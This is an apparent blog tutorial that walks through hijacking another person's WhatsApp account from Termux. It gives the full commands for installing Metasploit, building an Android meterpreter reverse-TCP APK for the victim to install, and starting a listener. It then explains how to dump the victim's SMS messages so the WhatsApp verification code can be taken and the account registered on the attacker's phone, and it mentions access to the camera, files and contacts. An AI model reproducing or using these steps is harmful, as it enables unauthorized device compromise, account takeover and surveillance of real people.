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Tuesday 15 September 2020

How To Hack WhatsApp Using Termux

Hello guys, most of you're requested, so in this post am going to explain how you can use Termux to hack WhatsApp, let's see, can we really hack someone's WhatsApp account using Termux?

The fact is using SS7 in Termux is not possible and therefore we aren't going to do expirement with SS7 in Termux instead am going to tell you how you can hack using some available tools

Before we are proceeding you must know how to use Termux, if you're newbie then follow below link to know how to use Termux effectively for ethical hacking, or if you're familiar with Termux then you can install popular hacking tools in Termux

If you're interested to hack whatsapp using termux then there are some senerios you need to keep in mind

  •  Most of the times you need the OTP to verify WhatsApp
  • You and your victim must be connected to the same Wi-Fi(Spoofing Method)
  • Either you have to hack the victim Mobile somehow

Sounds terrible ☹️

how to hack a whatsapp account using termux

It's been a long time you are asking us how to hack other whatsapp using termux
hacking WhatsApp through Termux is little bit harder and the success rate is quite low,

Most of you guys are asking that how to use QRjacker in Termux,

Note that QRjacker is not working on Termux so we can use it on Termux if we install Kali Linux in Termux

So in this tutorial am going to tell you how to install Metasploit in Termux and generate a payload then install the payload to victim phone, then remote access to the phone over the internet

Let's see

Firstly install Termux

Then type below command to install Metasploit Framework

 apt update && apt upgrade && apt install unstable-repo && apt update && apt install metasploit && msfconsole

That's all, Metasploit Framework will be installed in Termux

Hack WhatsApp with Termux using Metasploit

Now you have to create a payload
For that type this command

 msfvenom -p android/meterpreter/reverse_tcp LHOST=ur IP LPORT=anyport -a dalvik --platform android R > /sdcard/appname.apk

Generate payload

In LHOST, you must specify your Local IP Address, you can get IP by typing ifconfig in Termux

In LPORT you can give any port

After hitting the following command
Now appname.apk file will be created on your sdcard

You can give any name but I have chosen appname

Now you have to install the APK file in your victim phone

After installation you can listen to it
For that you have to run Metasploit framework and type below command

 msfconsole -x “use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST your IP; run”

That's all, you can listen to it
You can do some stuff like accessing camera, Files, read contacts

Since we are going to hack WhatsApp, for that we have to install WhatsApp on our phone or we can use Parallel Space

during Registration you have to give your victim's phone number

Now the OTP will be sent to his/her mobile
It's time to use dump_sms command
After that it will create a .txt file which contains the SMS

Now you can use nano to read the message
And copy the code and use it for WhatsApp verification

That's all, in this way we can hack whatsapp using termux

Still have anything to ask then feel free to comment below


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